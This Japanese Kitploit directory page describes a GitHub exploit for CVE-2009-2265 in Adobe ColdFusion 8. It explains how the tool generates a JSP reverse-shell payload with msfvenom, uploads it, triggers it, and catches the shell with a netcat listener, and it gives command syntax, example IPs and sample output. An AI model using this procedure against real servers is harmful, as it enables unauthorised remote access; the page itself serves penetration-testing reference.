Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Adobe-ColdFusion-8-RCE-CVE-2009-2265 — Adobe ColdFusion 8 - リモートコマンド実行 (RCE) | Kitploit
ツール/GitHubGitHub/0xdtc/adobe-coldfusion-8-rce-cve-2009-2265
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHub0xdtc/adobe-coldfusion-8-rce-cve-2009-2265

Adobe-ColdFusion-8-RCE-CVE-2009-2265

Adobe ColdFusion 8 - リモートコマンド実行 (RCE)

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
11年前未レビュー

Adobe ColdFusion 8 - リモートコマンド実行(RCE)エクスプロイト

概要

このエクスプロイトは、Adobe ColdFusion 8の既知の脆弱性(CVE-2009-2265)を標的とします。悪意のあるJSPペイロードをアップロードしてリバースシェル接続を確立することで、リモートコマンド実行(RCE)を可能にします。


エクスプロイトの詳細

  • CVE: CVE-2009-2265
  • 脆弱性: Adobe ColdFusion 8におけるファイルアップロードの不適切な処理。
  • 影響を受けるバージョン: Adobe ColdFusion 8。
  • 影響: 攻撃者がサーバ上で任意のコマンドを実行できるようになります。

機能

  1. msfvenomを使用してJSPペイロードを自動生成します。
  2. マルチパートPOSTリクエストを使用してペイロードをアップロードします。
  3. ペイロードをトリガーしてリバースシェルを確立します。
  4. 実行後にローカルのペイロードファイルを自動的にクリーンアップします。

使用方法

このエクスプロイトを使用するには、以下が必要です:

  • Kali Linuxマシンまたは同様のペネトレーションテスト環境。
  • 指定されたポートで待受するためのNetcatのインストール。
  • 脆弱なAdobe ColdFusion 8サーバ。

コマンド構文

root@kitploit:~
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>

引数

  • -l <LHOST>: ローカル攻撃者のIP(例:10.10.16.5)。
  • -p <LPORT>: リバースシェルのためのローカル攻撃者のポート(例:9001)。
  • -r <RHOST>: リモートターゲットのIP(例:10.10.10.11)。
  • -q <RPORT>: ColdFusionが動作しているリモートターゲットのポート(例:8500)。

使用例

root@kitploit:~
./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
  1. 攻撃者マシンでリスナーを起動します:

    root@kitploit:~
    nc -lnvp 9001
    
  2. 適切な引数でエクスプロイトを実行します。

  3. 実行されると、ペイロードがリスナーに接続して戻ります。


動作の仕組み

  1. ペイロードの生成:

    • スクリプトはmsfvenomを使用して悪意のあるJSPペイロードを生成します。
    • ペイロードは指定されたLHOSTとLPORTにリバースシェルを開始します。
  2. ペイロードのアップロード:

    • POSTリクエストを使用して、脆弱なColdFusionサーバにペイロードがアップロードされます。
  3. ペイロードのトリガー:

    • アップロードされたペイロードは、ファイルのURLにGETリクエストを送信することで実行されます。
  4. リバースシェルの確立:

    • リバースシェルが確立され、攻撃者にターゲットシステムへのアクセスを提供します。

必要条件

  • ペイロード生成のためのmsfvenom。
  • ファイルのアップロードとペイロードのトリガーのためのcurl。
  • リバースシェル接続の待受のためのnc(Netcat)。

出力例

root@kitploit:~
[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
    <script type="text/javascript">
        window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
    </script>
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!

免責事項

このスクリプトは教育目的のみです。所有しているシステム、またはテストする明示的な許可があるシステムでのみ使用してください。所有していないシステムでのこのエクスプロイトの無断使用は違法であり、非倫理的です。


作者

[0xDTC]によって開発されました。

ツールをダウンロード